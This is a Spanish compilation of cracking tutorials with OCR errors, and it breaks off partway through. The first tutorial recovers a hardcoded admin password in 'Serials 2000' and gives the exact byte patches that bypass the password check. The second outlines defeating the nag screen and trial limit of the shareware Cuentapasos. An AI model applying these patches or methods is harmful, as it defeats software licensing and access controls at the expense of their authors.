Todo esta realmente claro: 


si “el número de caracteres de nuestro password” no es igual a '8”... la siguiente instruccion dará el salto al offset designado. 
si “el número de caracteres de nuestro password' es igual a '8' la siguiente instrucción no hara el salto condicional y continuaremos en la 
siguiente instrucción. 


hmm, nuestra contraseña tiene 9 caractéres... 
Entonces la instrucción JNE saltará... si, lo hace. 


Intenta poner una password de 8 caractéres en el s2k, por ejemplo: 'tntpower' y vuelve a este código de nuevo... hmm no salta ahora :) 


Bueno, ya sabemos que el password correcto tiene 8 caractéres. 


Segundo 'grupo' de Instrucciones... 


:00403456 
:00403459 
:0040345B 
:0040345F 
:00403461 
:00403465 
:00403467 
:0040346B 
:0040346D 
:00403471 


803868 
7531 
80780161 
752B 
80780263 
7525 
80'78036B 
751F 
80780474 
7519 


cmp byte ptr [eax], 68 
cmp byte ptr [eax+01], 61 
cmp byte ptr [eax+02], 63 


cmp byte ptr [eax+03], 6B 


cmp byte ptr [eax+04], 74 


:00403473 80780568 cmp byte ptr [eax+05], 68 


:00403477 7513 jne 0040348C 
:00403479 80780669 cmp byte ptr [eax+06], 69 
:0040347D 750D jne 0040348C 
:0040347F 80780773 cmp byte ptr [eax+07], 73 
:00403483 7507 jne 0040348C 


:00403485 C7466001000000 mov [esi+60], 00000001 


:0040348C 8BCE mov ecx, esi 
:0040348E E8D9CDO000 Cal1 0041026C 
:00403493 5E pop esi 
:00403494 C3 ret 


Vamos a analizar estas instrucciones... es fácil de ver... 8 comparaciones y 8 instrucciones JNE 'salta si no es igual". 
Recuerda que en el registro EAX esta situado nuestro password, si estamos aquí es porque nuestro password tiene 8 caractéres, y ahora hay 8 
comparaciones :)... no necesitas pensar demasiado para ver lo que va a ocurrir aquí. 


Exacto, cada caracter de la contraseña será comparado con algo y si no es igual alguno de ellos pues saltara al offset designado. 
La primera comparación es: (( byte ptr [eax] )) con (( 68 )) 


byte ptr [eax] = primer caracter de EAX...en EAX esta situada nuestra password. 
68 = Ascii.... usa SoftIce para convertir 68 (escribe 268) y te saldrá: 'h'. 


Si el primer caracter de EAX es igual a 'h' entonces no saltará y continuaremos con la siguiente instrucción... 
Como puedes ver todas las comparaciones son del mismo estilo... 


La primera comparación es: (( byte ptr [eax] )) con (( 68 )) 

La segunda comparación es: (( byte ptr [eax+1] )) con (( 61 )) 
La tercera comparación es: (( byte ptr [eax+2] )) con (( 63 )) 
La cuarta comparación es: (( byte ptr [eax+3] )) con (( 6B )) 
La quinta comparación es: (( byte ptr [eax+4] )) con (( 74 )) 
La sexta comparación es: (( byte ptr [eax+5] )) con (( 68 )) 

La séptima comparación es: (( byte ptr [eax+6] )) con (( 69 )) 
La octava comparación es: (( byte ptr [eax+7] )) con (( 73 )) 


Entoces el password correcto es: 
68(h) 61(a) 63(c) 6b(k) 7400 6800 69009 7300 
x = hazlo tu mismo :) 


ok, ya está hecho todo el trabajo... como puedes ver ha sido realmente fácil conseguir el password correcto... solo hemos necesitado analizar 
un poco el código. 


Ahora vamos a jugar un poco... conseguir solo el password no es suficiente para nuestras retorcidas cabezas :). 


Jugando con el Código 12Parte 
INTRODUCIR CUALQUIER PASSWORD 


hmm, ¿porqúe tenemos que poner siempre el password para entrar al menú? ahora podemos jugar con el código y hacer que acepte cualquier 
password... es facilito, ya lo verás. 


Observa que el checkeo de longitud de password o cada checkeo de los caractéres tiene un JNE, dirigido hacia el offset 0040348C. 
Esto hace que si el password no es correcto, se nos salta el offset 00403485 y por lo tanto no se cumple la instrucción, que debería mover 1 
(mov) a la posición [esi+60]. 


Este 1 le dice al programa en un posterior checkeo (que no hace falta ni buscar) si hemos introducido el password correcto. 


:00403483 7507 jne 0040348C 


:00403485 C7466001000000 mov [esi+60], 00000001 
:0040348C 8BCE mov ecx, esi 


¿Como podemos arreglar esto?... si, hay varios métodos... 
e Cambiar todas las instrucciones JNE por NOP (nop=instrucción que no hace nada). 


Esta es una forma muy sucia... demasiados bytes parcheados... funcionará, pero yo creo que cuantos menos bytes parcheados 
mejor es el crack. 


e Hacer al código saltar directamente a 00403485 (la intrucción que pone 1 en [esi+60]) 
Esta es una forma más limpia... solo 2 bytes serán cambiados. 


Ok, entonces cambiaremos el primer JNE (el del checkeo de longitud) a un JMP (el JMP hace que salte siempre... ya no es una condición) a 
donde queremos. 


Original: 00403454 “7536 jne 0040348C 
Primero haz los cambios en el Softlce (antes de hacer una modificación real en el fichero) para probar si todo va bien. 


Para hacer el cambio, vete a ese offset (comienza el proceso usando F10 para llegar allí). 
Cuando ya estes situado en el offset q queremos, escribe: a 


Ahora puedes editar ese offset... escribe la nueva instrucción: jmp 403485 y pulsa enter. 


Parcheado: 00403459 EB2F jmp 00403485 


Los bytes han sidos cambiados (en memoria), después de haber hecho esto, desactiva todos los breakpoints (bd*) y continua la ejecución 
normal,.. 


whouuu!!!!, funciona perfectamente :), ahora s2k acepta cualquier cosa q pongamos, incluso una password en blanco. 


Haré una explicación cortita de como parchear el ejecutable permanentemente... 

Coje un buen editor hexadecimal como por ejemplo hiew (dos) o ultraedit (windows), vete al offset donde esta la instrucción que queremos 
cambiar y modifica sus bytes. 

Estos son los bytes originales: 75 36 | Y estos los cambiados: EB 2F 

(La traducción a hexadecimal la obtienes en el softice) 

Para ir a la localización exacta, utiliza un conversor de offset/hex. 


Jugando con el Código 22Parte 
DIRECTAMENTE AL MENÚ 


Bueno Bueno... :)... esto cada vez se pone más interesante. 


Ya hemos conseguido el password, hemos hecho que acepte cualquier cosa que metamos... que nos falta? 

aha, la perfección :)... y para que queremos que nos salga ese menú de meter el password si aceptará cualquier cosa?, ahora vamos a hacer 
que directamente cuando le demos a la opción en la barra de menú se salte el rollo ese de meter el password y nos abra directamente la 
ventana con las opciones de 'administrador". 


Ya has visto lo facil que es trabajar con el código y modificarle sabiendo que es lo que hace. 
Ahora tampoco se va a complicar mucho más, pq solo tenemos que hacer una busqueda y unos pequeños cambios teniendo en cuenta todos 
los conocimientos que hemos adquirido sobre este programa anteriormente. 


Ok, vamos al atakeerrrr! 
Organización... 


1er Paso: Buscar llamada al Menu 'Administration Tools' 


20 Paso: Hacer que se salte el menu ese del password y que vaya directamente a donde queremos, teniendo en cuenta q la llamada que se 
hace al menu del password devuelve una respuesta como ya sabemos (recordad el mov 1 a esi+60). 


3er Paso: Hacer permanentes nuestros cambios en el ejecutable e irnos por hay a dar una vuelta con la novia (eso solo si teneís la suerte de 
tener una :))). 


Comenzamos, 

Como lo que buscamos es la creación de un menú, lo mejor para encontrar quien o que llama a este menú será desensamblar el ejecutable con 
el W32DSM. 

Hacemos una copia del ejecutable y la desensamblamos... ningún problema para hacerlo... ni Antiw32dsm, ni encriptaciones, ni compresores... 
nada... joer q rollo :) 


También podriamos hacerlo con SoftlIce, pero mejor usamos W32DSM para q resulte más facil y veamos como atacar a la victima con distintas 
aplicaciones. 


Pues para buscar el menú que nos interesa no tenemos más que mirar en el DIALOG INFORMATION que está al principio de la 'dead list': 


Name: DialogID_0092, * of Controls=004, Caption: "Password Verification", ClassName:"" 
001 -— ControlID:0406, Control Class: "EDIT" Control Text:"" 

002 -— ControlID:0001, Control Class: "BUTTON" Control Text:"8s0k" 

003 -— ControlID:0002, Control Class: "BUTTON" Control Text:"sCancel" 

004 -— ControlID:FFFF, Control Class: "STATIC" Control Text: "Enter Admin. Password:" 


Aquí lo tenemos... 
El dato más importante es el de 'DialogID_0092', que nos servirá para encontrar cuando es llamado este menú. 


Damos a Search, Find Text, y ponemos 'DialogID_0092... ploff... hay está :) 
* Possible Reference to Dialog: DialogID_0092 


Ahora solo tenemos que subir para arriba y observar quien hace referencia a esta llamada... bueno ya lo sabemos (el click al menú de arriba)... 
pero lo que queremos saber realmente es donde ocurre esto. 


Pues subimos unas cuantas líneas y hay está!. 


* Referenced by a CALL at Address: 
| :00402974 


Jeje, una CALL ha llamado aquí... exactamente ha sido la localizada en el OffSet 00402974... ya tenemos a nuestra victima rodeada, bueno 
vamos allí a ver q encontramos. 


:00402974 E837090000 call 004032B0 
:00402979 8D8C24A4000000 lea ecx, dword ptr [esp+000000A4] 
:00402980 C784249401000000000000 mov dword ptr [esp+00000194], 00000000 


* Reference To: MFC42.Ordinal:09D2, Ord:09D2h 


:0040298B E8E8D80000 Cal1 00410278 

:00402990 83F801 cmp eax, 00000001 

:00402993 7571 jne 00402A06 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax 

:004029A0 7452 je 004029F4 


hmm, interesante... 
A mi ya se me ocurre una idea de que hace aquí el programa... pero mejor vamos directamente a SoftIce a verlo en tiempo de ejecución. 


Para esto hay q poner un Breakpoint en el offset 402974, ah, ahora recuerdo que esto suele causar problemas a muchos newbies. 
Voy a explicar como poner correctamente el Breakpoint para evitar mensajes como 'Invalid Address' o que no funcione. 


Softlce necesita que le demos una referencia de que app debe ser la actuada mediante el breakpoint. Para esto usaremos el Symbol Loader, 
aplicación incluida con Softlce que tendrás en tu carpeta de Numega Softlce. 


Ok, abrimos el symbol loader, y en File/Open Module abrimos el ejecutable del Serials 2000. 
C:WProgram FilesiSerials 20001Serial2k.exe - loaded successfully 


Bueno, ahora para ejecutarle no tenemos mas que dar en Module/Load o el icono de los engranajes. 
Nos saldrá un error sin importacia, le damos ok, y sigue la ejecución del Serials 2k. 


Plof!, SoftIce aparece ante nuestros ojos... este es el momento perfecto para meter el breakpoint. Como podrás comprobar en la barrita verde 
aparece que esta procesando en el ejecutable del Serials 2000. 


Metemos el BreakPoint: BPX 402974, y le damos a F5 para que continue cargando. 


Ya está el anzuelo puesto jejeje, ahora solo tenemos que hacerle picar. 
Pulsamos File/Administration Tools... y... como queriamos, Softlce salta antes de que aparezca ninguna ventana inutil. 


Estamos viendo el código que anteriormente veíamos con W32DSM... con la ventaja de que ahora podemos ver que hace cada llamada y los 
posteriores saltos. 


:00402974 E837090000 call 004032B0 

:00402979 8D8C24A4000000 lea ecx, dword ptr [esp+000000A4] 
:00402980 C784249401000000000000 mov dword ptr [esp+00000194], 00000000 
:0040298B E8E8D80000 Cal1 00410278 

:00402990 83F801 cmp eax, 00000001 

:00402993 7571 jne 00402A06 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax 

:004029A0 7452 je 004029F4 


Aparecemos en 402974 como nuestro breakpoint le había dicho al fiel SoftIce, pulsamos F10 para pasar a la siguiente instrucción y 
observamos que no ocurre nada (en pantalla), seguimos hasta la siguiente call y al pulsar F10 sobre está nos aparece la ventana de introducir 
password. 

Ya sabemos donde está la función que abré esa ventana. Si nos metemos en la call (con F8) y damos unas cuantas vueltas, llegaremos hasta el 
código dónde se encuentran las comparaciones que hemos estudiado anteriormente. Pero ahora no es necesario eso. 


Solo tenemos que anular esa llamada y adecuar la comprobación de la respuesta que se obtiene a nuestras necesidades. 
Primero vamos a hacerlo todo en un modo temporal para ir comprobando que sucede con cada instrucción importante. 
La primera instrucción (call 004032b0) aparentemente no hace nada que no queramos, por lo que no la cambiamos. 


La siguiente call es la que llama a la ventana de meter el password... vamos a deshacernos de ella, cambiando sus bytes actuales por NOPs 
(90). 

Cuando estamos situados en 0040298B, escribimos DB 40298B, entonces en la ventana de datos (arriba) aparecerán los bytes de esta 
instrucción. 


Pues pulsamos con el botón del ratón arriba en el primero y sustituimos todos los bytes por 90. 
Entonces quedaría asi: 


Inicialmente: E8 E8 D8 00 00 
Modificado: 90 90 90 90 90 


Cuando pulsamos intro, vemos como en la ventana de instrucciones hay un cambio y aparecen 5 nops en vez de la anterior call. 


ya podemos ir pulsando F10 y pasando cada NOP. 


Hasta que llegamos a los saltos de comprobación. 


:0040298B E8E8D80000 Cal1 00410278 [5 Nops <> Call q llama al password. 
:00402990 83F801 cmp eax, 00000001 | Compara EAX con 1... 

:00402993 7571 jne 00402A06 |Salta si EAX no es = 1 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104] 

:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | Comprueba si EAX es 0 

:004029A0 7452 je 004029F4 |Salta sieso0 


Como vemos al ir pulsando F10 por el código, después de la primera comparación, saltará y entonces el programa no hará nada. Eso es 
equivalente a que pulsemos el botón Cancel en la ventana de meter el password. 


La segunda comparación (test eax, eax) y su correspondiente salto condicional también hacen de las suyas :). 
Aquí también saltará al offset 004029F4, haciendo aparecer directamente el messagebox de Invalid Password. 


Pues ya está todo resuelto... nos tenemos que deshacer de la call que llama a la ventana de password y evitar los dos saltos condicionales. 


Podriamos dejarlo 'mu pofesional' convirtiendo el primer call en una instrucción que nos mueva a EAX un 1, y asi el salto condicional que 
tenemos a continuación no saltase nunca. 

Después hay una instrucción que mueve a EAX algo situado en esp+00000104. Si lo que mueve es un 0, el salto condicional de la siguiente 
línea nos llevará a la ventana de 'invalid password', entonces pondremos un 1 también, asi este salto se portará adecuadamente y nos dejará 
seguir sin problemas. 


Todo esto son pijadillas... para hacer algo rapido podemos llenar de NOPs la call y los saltos y seguro que funciona. Pero esto demuestra que 
sabemos lo que estamos haciendo. 


El cambio lo realizamos en memoria con SoftlIce... 
Esto ya debería estar claro como hacerlo. 


Para que el programa se vuelva a cargar en memoria correctamente (anulando todos los cambios que hicimos anteriormente), le cerramos y le 
volvemos a cargar con el Symbol Loader. 


Entonces activamos nuestro efectivo breakpoint en 402974 y comenzamos con las modificaciones finales. 
Usando F10, llegamos hasta 0040298B. Escribimos a en softice y hacemos nuestra bonita modificación de mover a EAX un 1 :). 


a [enter] 
mov eax, 1 


Ya está.. hmmm pero tenemos que tener en cuenta una cosa. La anterior instrucción (la call) usaba 5 bytes, hemos tenido suerte, y nuestra 
instrucción (el mov) ocupa también 5. Entonces no tendremos q añadir nada para rellenar. 


Entonces el código quedaría asi: 
Inicialmente: E8 E8 D8 00 00 (call 00410278) 
Nuevo código: B8 01 00 00 00 (mov eax, 1) 


Ahora nos queda hacer el otro cambio... es en 402995, 
Nos situamos allí y escribimos a en SoftIce. Ahora ponemos lo que queremos: 


mov eax, 1 


ya está... hmmmmmm ahora si que tenemos el 'problema' ese. Nuestra nueva instrucción ocupa 5 bytes, y la antigua ocupaba 7. 
Bueno, solamente tendremos que rellenar los dos bytes de diferencia con 2 nops. 


Ponemos DB 402995 en softIce, y en la parte de arriba nos aparecen los bytes de ese offset. 
Solo tenemos que poner 90 90 en el 00 00 que queda al final de la instrucción y ya está arreglado. 


Entonces el código quedaría asi: 
Inicialmente: 8B 84 24 04 01 00 00 (mov eax, dword ptr [esp+00000104]) 
Nuevo código: B8 01 00 00 00 90 90 (mov eax, 1 | nop | nop ) 


Resumen: 


Código Inicial: 

:0040298B E8E8D80000 Cal1 00410278 | Llamada a la ventana de Password 

:00402990 83F801 cmp eax, 00000001 Eax no es 1 si damos cancel 

:00402993 7571 jne 00402A06 | Vuelve al programa 

:00402995 8B842404010000 mov eax, dword ptr [esp+00000104]| a eax resultado checkeos 
:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | Comprueba si eax es 0. 

:004029A0 7452 je 004029F4 | Si es 0, salta a Invalid password. 


Código 'Reparado': 


:0040298B B801000000 mov eax, 1 (Nuevo) — Mueve 1 a eax 
:00402990 83F801 cmp eax, 00000001 | Eax siempre será 1 
:00402993 7571 jne 00402A06 | Nunca saltará 

:00402995 B801000000 mov eax, 1 | (Nuevo) — Mueve 1 a eax 
:0040299A 90 nop | (relleno) 

:0040299B 90 nop | (relleno) 

:0040299C 6A00 push 00000000 

:0040299E 85C0 test eax, eax | eax lo pusimos en 1... 
:004029A0 7452 je 004029F4 | Nunca saltará 


Ok, ya está, ahora le damos en File/Administrationm Tools y directamente nos abré la ventana de opciones sin pedir ni password ni leches. :) 


El cambio para que sea permantente en el ejecutable se realiza como ya explique antes... solo hay que modificar los bytes con un editor 
hexadecimal y listo. 


Despedida, agradecimientos y esas cosas.... 


Ha quedado un tutorial bastante extenso, pero es lo que ocurre cuando se explica todo y no se da nada por supuesto... cosa que he intentado 
hacer (menos en lo de parchear los ejecutables) para que nadie se quede con dudas o atascado en cierto punto o haga cosas solo porque las 
pone aquí sin razonar el porqué. 


Si os ha gustado este tutorial hacedmelo saber escribiendome a tntcrackteamO hotmail.com. 
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Primero a Thndrkiss por hacer el Serials 2k: ey, estoy ayudando a tus coders a mejorar la seguridad para próximas versiones... 
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* Biglarry , NetKing , ChosenFew , Zutphen, SoundMan 

* rott, Vagante , ip], Trevil , INSOMNIA , ¡D|Victim , bigeasy 

* DRinfoTHV , SiLvIuVBS , Strega, “neo , CIRUS 
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Nos vemos en el próximo Tutorial... 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


Whiskey Kon Tekila 


| Programa Cuentapasos 3.75 W95 /W98 / NT 


| Descripción Control del gasto telefónico 
Po Tipo Shareware 
Url http://www .cuentapasos.com 
| Protección Nag Screen. Periodo evaluación de 30 dias 
[Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas [Softlce v4.0, SmartCheck 6.0, Spy++ 
Objetivo Simular estar registrados. 


| Cracker Mr. Blue 
Fecha 18 de Octubre de 1999 


- 
Vi 


Quién no haya intentado crackear este clásico, o alguna de sus versiones predecesoras, que me tire la 
primera piedra... 


Introducción 


Todos hemos oído hablar del Cuentapasos que, a pesar de existir otros programas equivalentes de 
distribución gratuita, sigue siendo una codiciada presa. Nos encontramos ante una aplicación escrita en 
Visual Basic, en la que el autor ha intentado protegerla por todos lados, tapando entradas y huecos, 
cerrándonos puertas de formas más o menos inteligentes. Y sabemos que cuanto más interés pone el 
autor en proteger una aplicación, más interesante hace a la presa, desde el punto de vista didáctico que 
es el que nos mueve a los miembros de WKT!. 


Sirva el presente tutorial para demostrar la gran dificultad que supone para cualquier programador 
realizar una protección eficiente de sus aplicaciones cuando estas están escritas en Visual Basic. La 
nueva forma de compilación en p-code no hace más que facilitar las cosas a los amantes de la ingeniería 
inversa. De hecho, durante el tutorial se mostrará que desproteger un programa de Visual Basic p- 
compilado es mucho más sencillo e inmediato que el mismo compilado en código nativo. 


Aprenderemos, además de cómo pelearnos con éxito contra el p-code, otras técnicas exóticas. 
Reconozco que podría haberse hecho de otra forma menos elaborada, pero nuestra meta no es crackear; 
es aprender, enseñar y mostrar nuevas técnicas crackeando. 


Reconocimiento y exploración 


Veamos a que nos enfrentamos. Al ejecutar el programa, nos aparece una pantalla de bienvenida, en la 
que posteriormente aparece que es una versión de evaluación. Sobre esta pantalla aparece otra que nos 
muestra los datos de la aplicación, dirección de correo electrónico del autor, etc... También aparece un 
código de compra, tanto en el título como en el botón de la derecha. 


Lo que nos interesa es que aparecen los días transcurridos del periodo de evaluación y los días que nos 
restan que no es más que treinta menos los días transcurridos. Además aparecen dos botones, Aceptar y 
Salir. Estos serán nuestros enemigos, la nag-screen y las rutinas que calculan los días restantes de 
evaluación. Nuestros objetivos serán que el usuario no se vea obligado a pulsar Aceptar para arrancar la 
aplicación (es irritante) y por supuesto, "ampliar" el periodo de evaluación (que alguien puede pensar 
que es insuficiente). 


Es una buena costumbre, para empezar a tomar contacto con el programa, y sobre todo en esta fase 
inicial en la que tenemos que planear nuestra estrategia, pasar a la víctima por un detector de formatos 
como el GetTyp. La salida del GetTyp nos muestra que el ejecutable se encuentra comprimido. Más 
explicaciones en el tutorial de Mr.Orange sobre descompresión manual con ProcDump. Al encontrarse 
comprimido, no podremos realizar un parcheador que actúe sobre el fichero en disco, tendremos que 
descomprimirlo previamente. 


El ratón virtual 


Para saltar la nagscreen vamos a utilizar un método clásico, que muchos pueden desconocer. Vamos a 
simular un click del ratón sobre el botón Aceptar, sin intervención del usuario. Es un método en desuso 
pero elegante y limpio, que nos permite comprender un poco mejor el funcionamiento del Windows y 
aprender muchas cosas, que es para lo que estamos aquí. 


¿Cómo se hace? Lo primero que debemos hacer es obtener el identificador del proceso del cual 
queremos depende el botón que queremos pulsar. Esto puede hacerse de dos maneras, o ejecutamos 
nosotros el proceso vícitma mediante CreateProcess o nos enganchamos al proceso que ya está en 
ejecución. Lógicamente, lo que a nosotros nos interesa es lo primero, para lo que crearemos un cargador 
del programa que será el que cargue a la aplicación víctima, esperará a que se cargue y buscará una 
referencia o handle de la ventana en la que se encuentra el botón que queremos pulsar. Después, 
buscaremos en esa ventana el botón que nos interesa y finalmente simularemos un click sobre él. 


Para buscar la ventana se utiliza la función EnumThreadWindows. Esta función sirve para enumerar 
todas las ventanas padre asociadas al thread que le pasamos como parámetro. Para ello, utiliza una 
función de tipo Callback que no es más que una función escrita por nosotros, que es ejecutada por 
EnumThreadWindows cada vez que encuentra una ventana. EnumThreadWindows le pasa a nuestra 
función de Callback el puntero a la ventana que ha encontrado.Nuestra función , a su salida, devolverá 
un booleano: False si ya se ha encontrado la ventana o True en caso contrario. EnumThreadWindows no 
devolverá el control a nuestro cargador hasta que la función de Callback haya devuelto un False o bien 
se hayan enumerado ya todas las ventanas. 


¿Y cómo sabemos si una ventana es la que buscamos o no? Para eso, nuestra función de Callback puede 
utilizar varias funciones: 


e GetClassName. Devuleve el nombre de la clase de la ventana que le pasamos como parámetro. 

e GetWindowText. Devuelve el texto o título de la ventana. 

e GetWindowRect. Devuelve las coordenadas de la esquina superior izquierda y esquina inferior 
derecha de la ventana. 


Una vez que hayamos encontrado la ventana que contiene el botón que queremos pulsar, debemos 
encontrar un puntero a este botón. En este caso, la función es EnumChildWindows, a la que le pasamos el 
puntero a una ventana padre, y nos enumera todas la ventanas hijas de ella (botones, cuadros de texto,...). 
Su funcionamiento es idéntico al de EnumThreadWindows. 


Ya tenemos el botón, ahora, a pulsarlo. Esto se realiza mediante PostMessage, que manda a la ventana 
que queramos, el mensaje que queramos. En este caso, enviaremos a un botón el mensaje BM_CLICK, 
que simula pulsar y soltar el botón del ratón. 


Más información y ejemplos sobre este tema en las páginas de Eravia, en la sección '+HCU's Papers: 


Simulating User Input to Eliminate Nag Screens por bb. 


¡ Atrapen a ese botón ! ¡ Atrapenlo ! 


Botones al borde de un ataque de nervios 


Antes de nada tenemos que recabar información sobre el botón que queremos "pulsar". Volvemos a 
arrancar el Cuentapasos pero dejamos sin pulsar el botón Aceptar. Arrancamos el Spy++ (o similar) para 
que nos muestre los parámetros de los componentes de la nagscreen, en especial los nombres de clase de 
los objetos de interes, el texto que aparece y las coordenadas. Pulsamos en la opción 'Find' (Alt+FF3) y 
pasamos el punto de mira por todos los componentes de interés. 


Por si no os habeis dado cuenta todavía, de ejecución en ejecución, los botones Aceptar y Salir se 
intercambian de manera aleatoria. Así, el autor evita una de las posibles formas de distinguirlos, 
mediante su situación en pantalla que nos da la función GetWindowRect. 


Tanto la nagscreen como la ventana de presentación son de la clase ThunderRT5Form, para poderlas 
distinguir nos tendremos que fijar en el título, ya que la pantalla de presentación no tiene título y la 
nagscreen tiene "Versión de Evaluación P...''. Por lo que parece, no vamos a tener problemas para 
encontrar la ventana padre de nuestro botón. 


Vamos a los botones. Podemos olvidarnos del botón "Comprar Programa P...'*, ya que es facilmente 
identificable por tamaño, situación y texto. Tanto el botón Aceptar como Salir, tienen exactamente el 


mismo tamaño, evitando así el autor del programa que podamos distinguirlos mediante la función 
GetWindowRect que también permite conocer el tamaño de una ventana. Los dos son de la clase 
ThunderRT5CommandButton (tampoco podremos distinguirlos por el nombre de la clase), y el 
texto... oh, 0h. Ninguno de los dos tienen texto, así que tampoco nos sirve GetWindowText. Y algunos se 
preguntarán, "Entonces ¿Aceptar y Salir qué son?" Pues está claro, si no son cadenas de texto serán ... 
imágenes. Para probarlo, cambiad el color de las ventanas de Windows y veréis que, aunque el botón 
cambia de color, las palabras Aceptar y Salir están enmarcadas por el fondo gris que trae por defecto el 
Windows. Como podeis ver, el autor ha obrado inteligentemente y se ha informado convenientemente 
sobre técnicas de ingeniería inversa (a lo mejor hasta nos lee a nosotros). 


Bien, no nos pongamos nerviosos. Tenemos dos botones que al parecer, cambian de sitio de manera 
aleatoria pero ... el orden de creación de los botones siempre será el mismo, independientemente de 
donde se situen. Si excarvamos más profundamente en la ayuda de la API nos encontramos la función 
GetNextWindow, que dado el puntero a una ventana hija, nos da el puntero a la ventana hija siguiente o a 
la posterior. Ya tan solo queda por descubrir que posición ocupa el botón Aceptar en el orden de 
creación. De hecho, la función EnumChildWindows enumera las ventanas hijas en el orden de creación, 
bastaría con coger, por ejemplo, la cuarta ventana que nos enumere suponiendo que el botón Aceptar sea 
la cuarta. 


Bueno, vamos a ver. Volvemos al Spy++ con esperanzas renovadas y pulsamos las propiedades del 
botón Aceptar de la nagscreen. En mi caso es el botón de la izquierda y es el último que aparece en la 
lista, si pinchamos en la etiqueta "Windows' de la ventana de propiedades del botón podemos recorrenos 
sus predecesores, y al ser el último, no tiene sucesores. Veamos si esto es cierto cuando Aceptar cambia 
de sitio. Cerramos el Cuentapasos y lo ejecutamos hasta que el botón Aceptar sea el del centro. 
Volvemos a ir al Spy++ y el botón Aceptar..... joderl, ahora es el penúltimo. Será "joío". Parece que el 
autor se ha informado "demasiado bien". 


Esto significa, que los botones no cambian de sitio, lo que cambia es la funcionalidad de cada uno de 
ellos, y la imagen que tienen incrustrada. No podemos distinguirlos por la posición, ni por el tamaño, ni 
por el texto, ni por la clase, .... 


Soluciones 


e Registrarnos. :-( 
e Aplicar la solución propuesta por bb en Simulating User Input to Eliminate Nag Screens. 
e "Amarrar" a ese travieso botoncito en un sitio fijo. 


La solución propuesta por bb, para el WinZip (un problema idéntico al nuestro) es utilizar la función 
GetPixel para poder distinguir qué imagen tiene cada botón. Para unas coordenadas dadas, esta función 
devuelve el color del pixel correspondiente. Conocemos las coordenadas de los dos botones, tan solo nos 
queda buscar un pixel en de los botones Aceptar y Salir que sean disitntos. Esto, con cualquier programa 
gráfico esta "chupao". Sería la solución ideal, ya que siempre debemos intentar modificar los menos 
posible el ejecutable de nuestra víctima. 


Como somos más chulos que un ocho, y lo que queremos es mostrar la facilidades que nos ofrece Visual 
Basic, vamos a "pegar" el botón Aceptar a un sitio fijo, para posteriormente, ametrallarlo a placer con 
PostMessage. Para hacer esto, tendremos que bucear en el código con ayuda del Softlce y del 
SmartCheck, y, lógicamente, cambiar algunas "cosillas" en las rutinas que deciden dónde se pone cada 


botón. Descubriremos la impactante sensación de "no me entero de ná" que se experimenta inicialmente 
al sumergirnos en el p-code. Agarraros al ratón que el viaje va a ser movidito. 


P-Code: Descenso a los infiernos de Micro$oft 


Número aleatorios 


Antes de entrar en faena, es casi obligado leerse el fantástico tutorial de Esiel2, CRACKEANDO EN VISUAL BASIC. Aprenderéis todo lo 


básico para para crackear programas de Visual Basic, y cómo configurar nuestras herramientas adecuadamente para sacarles el máximo 
partido al atacar programas escritos en este lenguaje. 


Tal y como hacemos siempre que tenemos una pieza realizada en Visual Basic, recurrimos al alucinante SmartCheck. Arrancamos el 
SmartCheck, cargamos el programa y, lo primero que nos aparece, a modo de advertencia es lo siguiente: 


cpasos32.exe 1s compiled to p-code...etc... 


Se podría decir que los amigos de NuMega nos quieren advertir que bajo esas condiciones, nuestra ya esacasa salud mental puede correr 
peligro. Tenemos la oportunidad de arrepentirnos, como en toda aplicación de Windows que se precie, pero "semos" valientes y elegimos 
continuar. 


Inicialmente no vamos a necesitar las llamadas a la API, por lo que podemos habilitar la opción de suprimir las llamadas a la API. 
Ejecutamos el Cuentapasos desde el SmartCheck, habilitando desde el principio la captura de eventos, y nos acomodamos en la silla, para 
ver pasar la película. Cuando aparezca la nagscreen, nos fijamos que posición ocupa el botón Aceptar y pulsamos Salir . Como vamos a 
intentar localizar donde pueden estar las rutinas que deciden donde se situa cada botón con llegar a la nagscreen tenemos de sobra. 


Nos vamos a la zona en la que se carga la nagscreen, al final. Buscamos el evento frmRegistro_Load: 


15240 Be lbláceptoCondiciones. Caption <-- "Entiendo que puedo utilizar CuentaPasos para uso exclusivo de e" [String] 
15241 E  lbláceptoCondiciones. FontBold <-- False [Boolean] 
15242 he emdComoRegistrarse.Caption <-- "Comprar ¿Programa P501092-1032-49" (String) 


And retums double:0,974189 [displayed as single-precision floating point) 


15244 Ba imgácepto.Picture 

15245 Eh cmdáceptar(0) Picture <-- ptr:DO52E634 [(WT_PTR] 
15246 he cmdáceptar(0)W'hatsThisHelplD <-- 26025 [Long] 
15247 Ba imgSalir. Picture 

15248 he emdáceptar(1) Picture <-- ptr.0052E590 (WT_PTR] 
15249 Ehe cmdáceptar(1] Cancel <-- True [Boolean] 

15250 Eh cmdáceptar(1]WhatsThisHelplD <-- 26030 (Long) 


15251 B fimRegistro_Load 
15252 -%  fimRegistro.Show 
15295 — $%% Now 

15296 $% Month 

15297 -S  fimSplash.Hide 


Como puede verse, lo último que hace la aplicación al cargar la nagscreen es inicializar las propiedades de los botones. En esta ocasión, el 
botón Aceptar me ha salido a la izquierda, por lo que tus resultados serán distintos si te ha salido en el centro. Así, en el evento 15242, se 
asigna la propiedad Caption del botón que muestra la ayuda de como registrarse. A partir del evento 15244, se asignan las propiedades a 
otros dos botones que no pueden ser otros que lo que a nosotros nos traen de cabeza. Se cargan las imágenes 'imgAcepto' y 'imgSalir', y se 
asignan a la propiedad Picture de cada uno de los botones. Al botón 'emdAceptar(1) se le activa la propiedad Cancel. Si desempolvamos la 
ayuda de Visual Basic, encontramos que si esta propiedad es TRUE, la tecla ESC activará al botón. Si volvemos a cargar el Cuentapasos 


(sin el SmartCheck) y pulsamos ESC en la nagscreen, la aplicación termina. Esto significa que en este caso el botón 'emdAceptar(1)' está 
funcionando como Salir. Conclusión, 'emdAceptar(0) es el botón de la izquierda y el otro el del centro. Esto podemos probarlo ejecutando 
